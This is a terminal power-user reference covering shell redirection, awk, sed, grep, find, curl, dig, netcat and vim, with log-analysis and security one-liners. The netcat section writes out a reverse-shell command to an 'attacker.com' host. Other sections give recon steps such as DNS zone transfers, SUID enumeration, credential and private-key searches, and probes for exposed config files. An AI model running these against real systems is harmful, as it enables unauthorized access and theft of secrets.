Terminal Power User: The Complete Reference

This document is your arsenal. Every command, pattern, and technique here is battle-tested. Master these and you’ll operate at the speed of thought.

Philosophy: The terminal is not a tool - it’s a language. Each command is a word, pipes are grammar, and one-liners are sentences. Fluency comes from daily use.

1. The Three Streams

Every process has three standard file descriptors. Understanding these is fundamental.

Stream Number Default Purpose

stdin

0

Keyboard

Input to the program

stdout

1

Terminal

Normal output (results)

stderr

2

Terminal

Errors, warnings, diagnostics

1.1. Redirection Operators

# Redirect stdout to file (overwrite)
command > file.txt

# Redirect stdout to file (append)
command >> file.txt

# Redirect stderr to file
command 2> errors.txt

# Redirect stderr to stdout (merge streams)
command 2>&1

# Redirect both stdout and stderr to file
command &> all_output.txt        # Bash shorthand
command > file.txt 2>&1          # POSIX compatible

# Redirect both to /dev/null (silent execution)
command &>/dev/null

# Redirect stdin from file
command < input.txt

# Here-document (multi-line input)
command << 'EOF'
line 1
line 2
EOF

# Here-string (single-line input)
command <<< "input string"

1.2. Practical Stream Examples

# Separate success and failure output
find /etc -name "*.conf" > found.txt 2> errors.txt

# Log everything with timestamps
./script.sh 2>&1 | while read line; do
    echo "$(date '+%Y-%m-%d %H:%M:%S') $line"
done | tee -a script.log

# Check if command succeeded (ignore output)
if command -v nmap &>/dev/null; then
    echo "nmap is installed"
fi

# Capture exit code AND output
output=$(command 2>&1)
exit_code=$?

2. Pipelines: The Unix Philosophy

Write programs that do one thing and do it well. Write programs to work together.
— Doug McIlroy

2.1. Pipeline Fundamentals

# Basic pipe: stdout of left → stdin of right
command1 | command2 | command3

# Named pipe (FIFO) for complex workflows
mkfifo /tmp/mypipe
command1 > /tmp/mypipe &
command2 < /tmp/mypipe

# Process substitution (treats command output as file)
diff <(command1) <(command2)

# Tee: split output to file AND continue pipeline
command | tee output.log | next_command

# Tee to multiple files
command | tee file1.txt file2.txt | next_command

2.2. Pipeline Patterns

# Count unique occurrences (THE classic pattern)
cat access.log | cut -d' ' -f1 | sort | uniq -c | sort -rn | head -20

# Same thing, more efficient (no useless cat)
cut -d' ' -f1 access.log | sort | uniq -c | sort -rn | head -20

# Filter → Transform → Aggregate
grep "ERROR" app.log | awk '{print $4}' | sort | uniq -c | sort -rn

# Real-time log monitoring with filtering
tail -f /var/log/syslog | grep --line-buffered "error" | while read line; do
    notify-send "Error detected" "$line"
done

3. AWK: The Power Tool

AWK is not just a command - it’s a programming language optimized for text processing.

3.1. AWK Fundamentals

# Basic structure: pattern { action }
awk '/pattern/ { print $0 }' file

# Field separator (-F)
awk -F':' '{ print $1 }' /etc/passwd        # Split on colon
awk -F',' '{ print $2 }' data.csv           # Split on comma
awk -F'\t' '{ print $1, $3 }' data.tsv      # Split on tab

# Built-in variables
awk '{ print NR, NF, $0 }' file             # Line number, field count, line
awk 'END { print NR }' file                 # Total line count
awk '{ print $NF }' file                    # Last field
awk '{ print $(NF-1) }' file                # Second-to-last field

3.2. AWK Variables Reference

Variable Description

$0

Entire current line

$1, $2…​

Fields 1, 2, etc.

$NF

Last field

NF

Number of fields in current line

NR

Current line number (across all files)

FNR

Line number in current file

FS

Field separator (input)

OFS

Output field separator

RS

Record separator (default: newline)

ORS

Output record separator

FILENAME

Current filename

ARGC/ARGV

Argument count/array

3.3. AWK Patterns

# Regular expression match
awk '/error/i { print }' log.txt            # Case insensitive
awk '$3 ~ /^192\.168/ { print }' access.log # Field matches regex
awk '$3 !~ /^10\./ { print }' access.log    # Field doesn't match

# Comparison operators
awk '$3 > 100 { print }' data.txt           # Numeric comparison
awk '$1 == "admin" { print }' users.txt     # String equality
awk 'length($0) > 80 { print }' file        # Line length

# Range patterns (from...to)
awk '/START/,/END/ { print }' file          # Print between patterns
awk 'NR==5,NR==10 { print }' file           # Print lines 5-10

# BEGIN and END blocks
awk 'BEGIN { print "Header" } { print } END { print "Footer" }' file

3.4. AWK Programming

# Variables and arithmetic
awk '{ sum += $1 } END { print "Total:", sum }' numbers.txt
awk '{ sum += $1; count++ } END { print "Average:", sum/count }' numbers.txt

# Conditional statements
awk '{
    if ($3 > 100) {
        print $1, "HIGH"
    } else if ($3 > 50) {
        print $1, "MEDIUM"
    } else {
        print $1, "LOW"
    }
}' data.txt

# Ternary operator
awk '{ print $1, ($2 > 0 ? "positive" : "non-positive") }' numbers.txt

# Loops
awk '{
    for (i = 1; i <= NF; i++) {
        print "Field", i, ":", $i
    }
}' file

# Arrays (associative)
awk '{
    count[$1]++
}
END {
    for (key in count) {
        print key, count[key]
    }
}' access.log

# Functions
awk '
function max(a, b) {
    return (a > b) ? a : b
}
{
    print max($1, $2)
}' numbers.txt

3.5. AWK One-Liners for Security

# Top 10 IPs by request count
awk '{print $1}' access.log | sort | uniq -c | sort -rn | head -10

# Failed SSH attempts by IP
awk '/Failed password/ {
    for(i=1;i<=NF;i++) if($i=="from") print $(i+1)
}' /var/log/auth.log | sort | uniq -c | sort -rn

# Bandwidth by IP (Apache combined log)
awk '{ip[$1]+=$10} END {for(i in ip) print ip[i], i}' access.log | sort -rn | head

# Extract all email addresses
awk '{
    for(i=1;i<=NF;i++) {
        if($i ~ /[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/) {
            print $i
        }
    }
}' file

# Parse CSV with quoted fields (complex)
awk -v FPAT='[^,]*|"[^"]*"' '{ print $2 }' data.csv

# HTTP response code distribution
awk '{codes[$9]++} END {for(c in codes) print c, codes[c]}' access.log | sort

# Time-based analysis (requests per hour)
awk -F'[\\[:]' '{hour[$3]++} END {for(h in hour) print h":00", hour[h]}' access.log | sort

3.6. AWK Math Functions

# Built-in math
awk 'BEGIN {
    print sin(1)          # Sine
    print cos(1)          # Cosine
    print exp(1)          # e^x
    print log(10)         # Natural log
    print sqrt(16)        # Square root
    print int(3.7)        # Integer part
    print rand()          # Random 0-1
    srand()               # Seed random
}'

# Practical: calculate percentages
awk '{
    total += $1
    values[NR] = $1
}
END {
    for (i = 1; i <= NR; i++) {
        pct = (values[i] / total) * 100
        printf "%s: %.2f%%\n", values[i], pct
    }
}' numbers.txt

4. SED: Stream Editor

Sed transforms text - search, replace, delete, insert.

4.1. SED Fundamentals

# Basic substitution: s/old/new/
sed 's/foo/bar/' file              # First occurrence per line
sed 's/foo/bar/g' file             # All occurrences (global)
sed 's/foo/bar/gi' file            # Global, case-insensitive

# In-place editing
sed -i 's/foo/bar/g' file          # Modify file directly
sed -i.bak 's/foo/bar/g' file      # Backup to file.bak first

# Delete lines
sed '/pattern/d' file              # Delete matching lines
sed '5d' file                      # Delete line 5
sed '5,10d' file                   # Delete lines 5-10
sed '$d' file                      # Delete last line

# Print specific lines
sed -n '5p' file                   # Print line 5 only
sed -n '5,10p' file                # Print lines 5-10
sed -n '/pattern/p' file           # Print matching lines (like grep)

4.2. SED Advanced

# Multiple commands
sed -e 's/foo/bar/g' -e 's/baz/qux/g' file
sed 's/foo/bar/g; s/baz/qux/g' file

# Address ranges
sed '10,20s/foo/bar/g' file        # Only lines 10-20
sed '/start/,/end/s/foo/bar/g' file # Between patterns

# Capture groups
sed 's/\(.*\):\(.*\)/\2:\1/' file  # Swap around colon
sed -E 's/(.*):(.*)/\2:\1/' file   # Extended regex (cleaner)

# Insert and append
sed '3i\New line before 3' file   # Insert before line 3
sed '3a\New line after 3' file    # Append after line 3
sed '/pattern/i\Insert before pattern' file

# Transform (character mapping)
sed 'y/abc/ABC/' file              # Like tr: a→A, b→B, c→C

# Delete empty lines
sed '/^$/d' file

# Remove leading/trailing whitespace
sed 's/^[[:space:]]*//' file       # Leading
sed 's/[[:space:]]*$//' file       # Trailing
sed 's/^[[:space:]]*//;s/[[:space:]]*$//' file  # Both

4.3. SED One-Liners for Security

# Remove comments and empty lines
sed '/^#/d; /^$/d' config.conf

# Extract URLs from file
sed -n 's/.*\(https\?:\/\/[^"<>[:space:]]*\).*/\1/p' file

# Obfuscate IP addresses in logs
sed -E 's/([0-9]{1,3}\.){3}[0-9]{1,3}/X.X.X.X/g' access.log

# Replace sensitive data
sed 's/password=.*/password=REDACTED/g' config.log

# Fix line endings (DOS to Unix)
sed 's/\r$//' file

# Number lines (like nl or cat -n)
sed = file | sed 'N;s/\n/\t/'

# Reverse lines (like tac)
sed '1!G;h;$!d' file

4.4. Real-World Example: SSH authorized_keys Management

Managing ~/.ssh/authorized_keys with awk and sed - actual commands from a production session.

4.4.1. View Keys with Line Numbers

# List all keys with line numbers
awk '{print NR": "$0}' ~/.ssh/authorized_keys
Example Output
1: ssh-ed25519 AAAA...software-key... user@host
2:
3: sk-ssh-ed25519@openssh.com AAAA...yubikey-primary... user@yubikey
4: sk-ssh-ed25519@openssh.com AAAA...yubikey-secondary... user@yubikey-backup
5:

4.4.2. Delete Blank Lines

# Remove all empty lines
sed -i '/^$/d' ~/.ssh/authorized_keys

4.4.3. Insert Key at Top of File

# Insert new key at line 1 (top of file)
sed -i '1i ssh-ed25519 AAAA...key-content... user@host' ~/.ssh/authorized_keys

4.4.4. Replace Specific Line

# Replace line 2 with new content
sed -i '2s/.*/new-key-content-here/' ~/.ssh/authorized_keys

Delimiter Collision: If your replacement text contains /, use a different delimiter:

# WRONG - fails because key contains /
sed -i '2s/.*/ssh-ed25519 AAAA.../evanusmodestus@d000/' file

# CORRECT - use # as delimiter instead
sed -i '2s#.*#ssh-ed25519 AAAA...evanusmodestus@d000#' file

4.4.5. Append Key at End of File

# Append to last line
sed -i '$a ssh-ed25519 AAAA... evanusmodestus@d000' ~/.ssh/authorized_keys

4.4.6. Combined Operations

# Delete blank lines AND insert at top in one command
sed -i -e '/^$/d' -e '1i ssh-ed25519 AAAA... evanusmodestus@d000' ~/.ssh/authorized_keys

# Verify result
awk '{print NR": "$0}' ~/.ssh/authorized_keys
Result After Operations
1: ssh-ed25519 AAAA...new-software-key... user@host
2: ssh-ed25519 AAAA...old-software-key... user@host
3: sk-ssh-ed25519@openssh.com AAAA...yubikey-primary... user@yubikey
4: sk-ssh-ed25519@openssh.com AAAA...yubikey-secondary... user@yubikey-backup

5. GREP: Pattern Matching

Grep finds patterns. Extended grep (egrep/grep -E) and Perl-compatible (grep -P) add power.

5.1. GREP Fundamentals

# Basic search
grep "pattern" file
grep -i "pattern" file             # Case insensitive
grep -v "pattern" file             # Invert (non-matching)
grep -c "pattern" file             # Count matches
grep -n "pattern" file             # Show line numbers
grep -l "pattern" *.txt            # Files containing match
grep -L "pattern" *.txt            # Files NOT containing match

# Recursive search
grep -r "pattern" /path            # Recursive
grep -rn "pattern" /path           # Recursive with line numbers
grep -rl "pattern" /path           # Just filenames

# Context
grep -A 3 "pattern" file           # 3 lines After
grep -B 3 "pattern" file           # 3 lines Before
grep -C 3 "pattern" file           # 3 lines Context (both)

5.2. GREP Extended Regex

# grep -E (or egrep)
grep -E "pattern1|pattern2" file   # OR
grep -E "^start" file              # Starts with
grep -E "end$" file                # Ends with
grep -E "^$" file                  # Empty lines
grep -E "^.{80,}$" file            # Lines > 80 chars
grep -E "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" file  # IP addresses

5.3. GREP Perl Regex (-P)

# Lookahead/lookbehind (Perl-compatible)
grep -P "(?<=password=)\w+" file   # Word after "password="
grep -P "(?<!not )error" file      # "error" not preceded by "not "
grep -P "\d{3}-\d{3}-\d{4}" file   # Phone numbers
grep -oP "(?<=src=\")[^\"]+(?=\")" file  # Extract src attributes

# Non-greedy matching
grep -oP "href=\".*?\"" file       # Shortest match

5.4. GREP for Security

# Find potential credentials
grep -rn "password\|passwd\|secret\|api[_-]key" /path

# Find IP addresses
grep -oE "([0-9]{1,3}\.){3}[0-9]{1,3}" file

# Find email addresses
grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" file

# Find private keys
grep -r "BEGIN.*PRIVATE KEY" /path

# Find encoded strings (base64-ish)
grep -oE "[A-Za-z0-9+/]{40,}={0,2}" file

# Search binary files
grep -a "pattern" binary_file      # Treat as text
strings binary_file | grep "pattern"  # Better approach

6. FIND: File Discovery

Find locates files by name, type, size, time, permissions, and more.

6.1. FIND Fundamentals

# By name
find /path -name "*.txt"           # Exact match (case sensitive)
find /path -iname "*.txt"          # Case insensitive
find /path -name "file*"           # Glob pattern

# By type
find /path -type f                 # Files only
find /path -type d                 # Directories only
find /path -type l                 # Symlinks only

# By size
find /path -size +100M             # Larger than 100MB
find /path -size -1k               # Smaller than 1KB
find /path -empty                  # Empty files/dirs

# By time (days)
find /path -mtime -1               # Modified within 1 day
find /path -mtime +30              # Modified more than 30 days ago
find /path -mmin -60               # Modified within 60 minutes
find /path -newer reference.txt    # Newer than reference file

# By permissions
find /path -perm 777               # Exact permissions
find /path -perm -u+x              # User executable
find /path -perm /u+x,g+x          # User OR group executable

# By owner
find /path -user root
find /path -group wheel
find /path -nouser                 # No valid user (orphaned)

6.2. FIND with Actions

# Execute command on each result
find /path -name "*.log" -exec rm {} \;           # Delete each
find /path -name "*.txt" -exec grep "pattern" {} \;  # Search each

# More efficient: batch execution
find /path -name "*.log" -exec rm {} +            # Delete in batches

# Delete (built-in, safer)
find /path -name "*.tmp" -delete

# Print with format
find /path -printf "%p %s %T+\n"   # Path, size, time

# Combine conditions
find /path -name "*.log" -size +10M -mtime +7     # AND (implicit)
find /path \( -name "*.txt" -o -name "*.md" \)    # OR
find /path ! -name "*.log"                        # NOT

6.3. FIND for Security

# World-writable files (security risk)
find / -type f -perm -002 2>/dev/null

# SUID/SGID binaries (privilege escalation vectors)
find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null

# Files modified in last 24 hours (incident response)
find / -type f -mtime -1 2>/dev/null

# Files owned by nobody (suspicious)
find / -nouser -o -nogroup 2>/dev/null

# Find config files with passwords
find /etc -type f -exec grep -l "password" {} \; 2>/dev/null

# Large files (data exfil check)
find / -type f -size +100M 2>/dev/null

# Recently accessed files
find /home -type f -atime -1 2>/dev/null

7. XARGS: Build Command Lines

Xargs converts stdin into arguments. Essential for piping to commands that don’t read stdin.

7.1. XARGS Fundamentals

# Basic usage: stdin → arguments
echo "file1 file2 file3" | xargs rm
find . -name "*.tmp" | xargs rm

# Handle filenames with spaces (-0 with null delimiter)
find . -name "*.txt" -print0 | xargs -0 rm

# Limit arguments per command
echo "1 2 3 4 5 6" | xargs -n 2 echo
# Output:
# 1 2
# 3 4
# 5 6

# Placeholder for argument position
find . -name "*.txt" | xargs -I {} cp {} /backup/

# Parallel execution
find . -name "*.gz" | xargs -P 4 gunzip     # 4 parallel jobs

# Prompt before execution
echo "file1 file2" | xargs -p rm            # Asks y/n for each

7.2. XARGS Patterns

# Find and grep (efficient)
find . -name "*.py" | xargs grep "import os"

# Batch rename
ls *.txt | xargs -I {} mv {} {}.bak

# Download multiple URLs
cat urls.txt | xargs -n 1 -P 5 curl -O      # 5 parallel downloads

# Kill processes by name
pgrep -f "python script.py" | xargs kill

# Run command for each line
cat hosts.txt | xargs -I {} ssh {} "uptime"

# Build complex commands
find . -name "*.c" | xargs -I {} sh -c 'gcc {} -o $(basename {} .c)'

8. CUT, TR, SORT, UNIQ: Text Processing

These small tools combine powerfully in pipelines.

8.1. CUT

# Extract fields (delimiter-based)
cut -d':' -f1 /etc/passwd          # First field (username)
cut -d':' -f1,3 /etc/passwd        # Fields 1 and 3
cut -d':' -f1-3 /etc/passwd        # Fields 1 through 3

# Extract characters
cut -c1-10 file                    # First 10 characters
cut -c5- file                      # From character 5 to end

# Different delimiter
cut -d',' -f2 data.csv             # CSV second column

8.2. TR (Translate)

# Character replacement
tr 'a-z' 'A-Z' < file              # Lowercase to uppercase
tr '[:lower:]' '[:upper:]' < file  # Same, POSIX class

# Delete characters
tr -d '0-9' < file                 # Remove all digits
tr -d '\r' < file                  # Remove carriage returns

# Squeeze repeated characters
tr -s ' ' < file                   # Multiple spaces → single space
tr -s '\n' < file                  # Multiple newlines → single

# Complement (inverse)
tr -cd '[:print:]' < file          # Keep only printable chars
tr -cd '0-9\n' < file              # Keep only digits and newlines

# ROT13 (CTF classic)
echo "secret" | tr 'A-Za-z' 'N-ZA-Mn-za-m'

8.3. SORT

# Basic sort
sort file                          # Alphabetical
sort -r file                       # Reverse
sort -n file                       # Numeric
sort -h file                       # Human-readable (1K, 2M, 3G)

# Sort by field
sort -t':' -k3 -n /etc/passwd      # By UID (field 3, numeric)
sort -t',' -k2 data.csv            # CSV by second column

# Unique sort
sort -u file                       # Sort and deduplicate

# Random sort (shuffle)
sort -R file

8.4. UNIQ

# Remove adjacent duplicates (MUST sort first)
sort file | uniq

# Count occurrences
sort file | uniq -c

# Only duplicates
sort file | uniq -d

# Only unique (non-duplicated)
sort file | uniq -u

# Ignore case
sort file | uniq -i

# THE classic combo: count and rank
cat access.log | cut -d' ' -f1 | sort | uniq -c | sort -rn | head -20

9. CURL: HTTP Swiss Army Knife

Curl does HTTP (and much more) from the command line.

9.1. CURL Fundamentals

# Basic GET
curl https://example.com

# Save output
curl -o output.html https://example.com
curl -O https://example.com/file.zip  # Keep original filename

# Follow redirects
curl -L https://example.com

# Show headers
curl -I https://example.com           # HEAD request (headers only)
curl -i https://example.com           # Include headers in output

# Verbose (debugging)
curl -v https://example.com

# Silent (no progress)
curl -s https://example.com

9.2. CURL HTTP Methods

# POST with data
curl -X POST -d "user=admin&pass=secret" https://example.com/login
curl -X POST -d '{"user":"admin"}' -H "Content-Type: application/json" https://api.example.com

# PUT
curl -X PUT -d "data" https://api.example.com/resource/1

# DELETE
curl -X DELETE https://api.example.com/resource/1

# Custom headers
curl -H "Authorization: Bearer TOKEN" https://api.example.com
curl -H "X-Custom: value" -H "Accept: application/json" https://api.example.com

# Upload file
curl -F "file=@/path/to/file.txt" https://example.com/upload
curl -T file.txt https://example.com/upload      # PUT upload

9.3. CURL for Security Testing

# Check for common files
curl -s -o /dev/null -w "%\{http_code}" https://example.com/robots.txt
curl -s -o /dev/null -w "%\{http_code}" https://example.com/.git/config
curl -s -o /dev/null -w "%\{http_code}" https://example.com/wp-config.php.bak

# Test authentication
curl -u admin:password https://example.com/protected

# Cookie handling
curl -c cookies.txt https://example.com/login    # Save cookies
curl -b cookies.txt https://example.com/profile  # Use cookies

# User agent spoofing
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://example.com

# Proxy (Burp Suite)
curl -x http://127.0.0.1:8080 https://example.com

# Ignore certificate errors (testing only!)
curl -k https://self-signed.example.com

# Timing analysis
curl -o /dev/null -s -w "DNS: %\{time_namelookup}s\nConnect: %\{time_connect}s\nTTFB: %\{time_starttransfer}s\nTotal: %\{time_total}s\n" https://example.com

# Download with rate limit
curl --limit-rate 1M -O https://example.com/large.zip

10. DIG: DNS Interrogation

Dig queries DNS servers directly. Essential for recon and troubleshooting.

10.1. DIG Fundamentals

# Basic query (A record)
dig example.com

# Short output (just the answer)
dig +short example.com

# Specific record type
dig MX example.com
dig TXT example.com
dig NS example.com
dig AAAA example.com
dig ANY example.com                # All records (often blocked)

# Query specific server
dig @8.8.8.8 example.com
dig @1.1.1.1 example.com

# Reverse lookup
dig -x 8.8.8.8

10.2. DIG Advanced

# Trace resolution path
dig +trace example.com

# No recursion (ask root servers)
dig +norecurse example.com

# DNSSEC information
dig +dnssec example.com

# Zone transfer (if allowed)
dig @ns1.example.com example.com AXFR

# Check specific record with authority
dig +noadditional +noauthority example.com

# TCP instead of UDP
dig +tcp example.com

# Timing information
dig example.com | grep "Query time"

10.3. DIG for Security/Recon

# Enumerate subdomains via zone transfer
dig @ns1.target.com target.com AXFR

# Find mail servers
dig MX target.com +short

# Find SPF record (email security)
dig TXT target.com +short | grep spf

# Find DMARC policy
dig TXT _dmarc.target.com +short

# Check CAA (certificate authority restrictions)
dig CAA target.com +short

# Find all nameservers
dig NS target.com +short

# Check DNSSEC
dig +dnssec target.com

# Reverse DNS sweep
for i in {1..254}; do
    dig -x 192.168.1.$i +short
done

11. NETCAT (NC): Network Swiss Army Knife

Netcat reads and writes network connections. TCP/UDP, client/server, anything.

11.1. NC Fundamentals

# Connect to port (client)
nc example.com 80

# Listen on port (server)
nc -l 4444

# Listen and keep listening after disconnect
nc -lk 4444

# UDP mode
nc -u example.com 53

# Port scan
nc -zv example.com 20-25           # Scan ports 20-25
nc -zv example.com 80 443 8080     # Scan specific ports

# Timeout
nc -w 3 example.com 80             # 3 second timeout

11.2. NC Practical Uses

# Simple HTTP request
echo -e "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n" | nc example.com 80

# File transfer
# Receiver:
nc -l 4444 > received_file
# Sender:
nc target.com 4444 < file_to_send

# Chat between machines
# Machine A:
nc -l 4444
# Machine B:
nc machine-a.com 4444

# Reverse shell (CTF/pentesting)
# Attacker listens:
nc -lvp 4444
# Target connects back:
nc attacker.com 4444 -e /bin/bash

# Banner grabbing
echo "" | nc -v target.com 22      # SSH banner
echo "" | nc -v target.com 25      # SMTP banner

# Test if port is open
nc -zv target.com 443 && echo "Port 443 open"

12. Bash Loops and Arrays

12.1. Loops

# For loop (list)
for host in server1 server2 server3; do
    echo "Pinging $host"
    ping -c 1 "$host"
done

# For loop (range)
for i in {1..10}; do
    echo "Number: $i"
done

# For loop (C-style)
for ((i=0; i<10; i++)); do
    echo "Index: $i"
done

# For loop (command output)
for file in $(find . -name "*.txt"); do
    echo "Processing: $file"
done

# While loop
while read line; do
    echo "Line: $line"
done < file.txt

# While with condition
count=0
while [ $count -lt 5 ]; do
    echo "Count: $count"
    ((count++))
done

# Until loop (opposite of while)
until ping -c 1 google.com &>/dev/null; do
    echo "Waiting for network..."
    sleep 1
done

# Infinite loop
while true; do
    # do something
    sleep 60
done

12.2. Arrays

# Declare array
declare -a hosts=("server1" "server2" "server3")

# Add element
hosts+=("server4")

# Access element
echo "${hosts[0]}"                 # First element
echo "${hosts[-1]}"                # Last element
echo "${hosts[@]}"                 # All elements
echo "${#hosts[@]}"                # Array length

# Loop over array
for host in "${hosts[@]}"; do
    echo "Host: $host"
done

# Loop with index
for i in "${!hosts[@]}"; do
    echo "Index $i: ${hosts[$i]}"
done

# Associative arrays (Bash 4+)
declare -A users
users["admin"]="password123"
users["guest"]="guest123"

for user in "${!users[@]}"; do
    echo "User: $user, Pass: ${users[$user]}"
done

# Array from command output
mapfile -t lines < file.txt
# or
IFS=$'\n' read -d '' -ra lines < file.txt

12.3. Conditional Execution

# AND (&&) - run second only if first succeeds
mkdir /tmp/test && cd /tmp/test

# OR (||) - run second only if first fails
ping -c 1 host || echo "Host unreachable"

# Combine them
command && echo "Success" || echo "Failed"

# If statement
if [ "$USER" = "root" ]; then
    echo "Running as root"
elif [ "$USER" = "admin" ]; then
    echo "Running as admin"
else
    echo "Running as $USER"
fi

# Test conditions
[ -f file ]      # File exists
[ -d dir ]       # Directory exists
[ -r file ]      # Readable
[ -w file ]      # Writable
[ -x file ]      # Executable
[ -z "$var" ]    # Variable is empty
[ -n "$var" ]    # Variable is not empty
[ "$a" = "$b" ]  # String equality
[ "$a" -eq "$b" ] # Numeric equality

13. Power Combinations

These one-liners combine multiple tools for maximum effect.

13.1. Log Analysis

# Top 10 IPs with failed SSH logins
grep "Failed password" /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn | head -10

# Requests per hour (Apache)
awk -F'[\\[:]' '{print $2":"$3}' access.log | sort | uniq -c | sort -rn

# Unique user agents
awk -F'"' '{print $6}' access.log | sort -u

# 404 errors with referring URLs
awk '$9 == 404 {print $11, $7}' access.log | sort | uniq -c | sort -rn

# Slow requests (>5 seconds)
awk '$NF > 5000000 {print $7, $NF/1000000"s"}' access.log | sort -t' ' -k2 -rn

# Real-time monitoring with color
tail -f access.log | awk '
    $9 >= 500 {print "\033[31m" $0 "\033[0m"; next}
    $9 >= 400 {print "\033[33m" $0 "\033[0m"; next}
    {print}'

13.2. Network Analysis

# All listening ports with process names
ss -tlnp | awk 'NR>1 {print $4, $NF}' | sed 's/.*://' | sort -n

# Established connections by remote IP
ss -tn | awk 'NR>1 {print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn

# DNS queries from packet capture
tcpdump -r capture.pcap -n port 53 2>/dev/null | awk '{print $NF}' | sort | uniq -c | sort -rn

# HTTP hosts from packet capture
tcpdump -A -r capture.pcap port 80 2>/dev/null | grep -oE "Host: [^\r]+" | sort | uniq -c

# ARP table analysis
arp -a | awk '{print $2, $4}' | tr -d '()'

13.3. Security Scanning

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null | xargs -I {} ls -la {}

# World-writable directories
find / -type d -perm -002 2>/dev/null | grep -v proc

# Find files modified in last day
find / -type f -mtime -1 2>/dev/null | grep -v "proc\|sys" | head -50

# Check for unauthorized SSH keys
find /home -name "authorized_keys" 2>/dev/null | xargs -I {} sh -c 'echo "=== {} ===" && cat {}'

# Process network connections
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
    name=$(cat /proc/$pid/comm 2>/dev/null)
    fd_count=$(ls /proc/$pid/fd 2>/dev/null | wc -l)
    if [ "$fd_count" -gt 10 ]; then
        echo "$pid ($name): $fd_count file descriptors"
    fi
done

# Extract strings from memory
for pid in $(pgrep -f "target_process"); do
    strings /proc/$pid/maps 2>/dev/null | grep -E "password|secret|key"
done

13.4. Data Extraction

# Extract all IPs from any file
grep -oE "([0-9]{1,3}\.){3}[0-9]{1,3}" file | sort -u

# Extract all URLs
grep -oE "https?://[^\"'<>[:space:]]+" file | sort -u

# Extract all email addresses
grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" file | sort -u

# Extract domains from URLs
grep -oE "https?://[^/]+" file | sed 's|https\?://||' | sort -u

# Extract base64-encoded strings
grep -oE "[A-Za-z0-9+/]{20,}={0,2}" file | while read b64; do
    echo "=== $b64 ===" && echo "$b64" | base64 -d 2>/dev/null
done

# Hex dump with ASCII
xxd file | head -50

# Extract printable strings from binary
strings -n 8 binary_file | grep -i "password\|secret\|key"

14. Vim: Editor Mastery

Vim is not optional. It’s the language your terminal speaks.

14.1. Registers: The Clipboard System

Register Description

"

Default register (last delete/yank)

0

Yank register (last yank only, not affected by delete)

1-9

Delete history (1=most recent)

_

Black hole register (discards text)

+

System clipboard

*

Primary selection (X11)

a-z

Named registers (you control these)

/

Last search pattern

:

Last command

.

Last inserted text

14.2. Black Hole Register: Preserve Your Buffer

The most useful intermediate technique - delete/change without overwriting your clipboard.

"_dd        " Delete line to black hole (preserves registers)
"_diw       " Delete inner word to black hole
"_ci"       " Change inside quotes to black hole, then paste with Ctrl+R 0
"_c$        " Change to end of line to black hole
"_x         " Delete char to black hole

14.2.1. Replace Inside Quotes (Preserve Paste Buffer)

"_ci"<Ctrl+R>0
  1. "_ci" - change inside quotes, send deleted text to black hole

  2. <Ctrl+R>0 - in insert mode, paste from yank register

14.3. Text Objects: Precision Editing

Object Description

iw / aw

inner word / a word (with space)

is / as

inner sentence / a sentence

ip / ap

inner paragraph / a paragraph

i" / a"

inner quotes / with quotes

i' / a'

inner single quotes / with quotes

i) / a)

inner parens / with parens

i] / a]

inner brackets / with brackets

i} / a}

inner braces / with braces

it / at

inner tag / with tags (HTML/XML)

i> / a>

inner angle brackets / with brackets

14.3.1. Text Object Combinations

ciw         " Change inner word
dap         " Delete paragraph
yi"         " Yank inside quotes
va}         " Visual select around braces
dit         " Delete inner tag content
cat         " Change around tag (including tags)

14.4. Motions: Navigate at Thought Speed

" Word motions
w           " Next word start
W           " Next WORD start (space-delimited)
b           " Previous word start
e           " Word end
ge          " Previous word end

" Line motions
0           " Line start
^           " First non-blank char
$           " Line end
g_          " Last non-blank char

" Search motions
f{char}     " Forward to char
F{char}     " Backward to char
t{char}     " Forward until char (stop before)
T{char}     " Backward until char
;           " Repeat f/t forward
,           " Repeat f/t backward

" Search patterns
/{pattern}  " Search forward
?{pattern}  " Search backward
*           " Search word under cursor (forward)
#           " Search word under cursor (backward)
n           " Next match
N           " Previous match

" Paragraph/block
{           " Previous blank line
}           " Next blank line
%           " Matching bracket

14.5. Operators + Motions = Power

" Operator + Motion
d$          " Delete to end of line
c/foo       " Change until 'foo'
y2}         " Yank 2 paragraphs
gUiw        " Uppercase inner word
gqip        " Format paragraph

" Operator + Text Object
ci(         " Change inside parens
da"         " Delete around quotes
yis         " Yank inner sentence
>i}         " Indent inside braces

" Operator + Count + Motion
d3w         " Delete 3 words
c2f)        " Change to 2nd closing paren
y5j         " Yank 5 lines down

14.6. Macros: Automate Repetition

qa          " Start recording to register 'a'
q           " Stop recording
@a          " Play macro 'a'
@@          " Repeat last macro
5@a         " Play macro 'a' 5 times

" Edit macro in register
"ap         " Paste macro content
... edit ...
"ay$        " Yank edited macro back to register 'a'

14.6.1. Macro Pattern: Apply to All Matches

" Record macro on first match
qq          " Start recording to q
n           " Go to next match (assumes search active)
... edits ...
q           " Stop recording

" Apply to all remaining matches
:g/pattern/normal @q

14.7. Visual Mode: Select Then Act

v           " Character visual
V           " Line visual
<C-v>       " Block visual (column editing)
gv          " Reselect last visual selection
o           " Move to other end of selection

" Visual block operations
<C-v>       " Enter block mode
I           " Insert at start of each line
A           " Append at end of each line
c           " Change each line
r           " Replace each character

14.7.1. Block Mode: Multi-line Editing

<C-v>       " Start block select
3j          " Select down 3 lines
I           " Insert mode (block)
//          " Type comment prefix
<Esc>       " Apply to all lines

14.8. Marks: Bookmarks Within Files

ma          " Set mark 'a' at cursor
'a          " Jump to line of mark 'a'
`a          " Jump to exact position of mark 'a'
''          " Jump to previous position
``          " Jump to exact previous position

" Special marks
'.          " Last change
'^          " Last insert
'[  ']      " Start/end of last yank/change
'<  '>      " Start/end of last visual selection

14.9. Substitution: Find and Replace

" Basic substitution
:s/old/new/         " First occurrence on current line
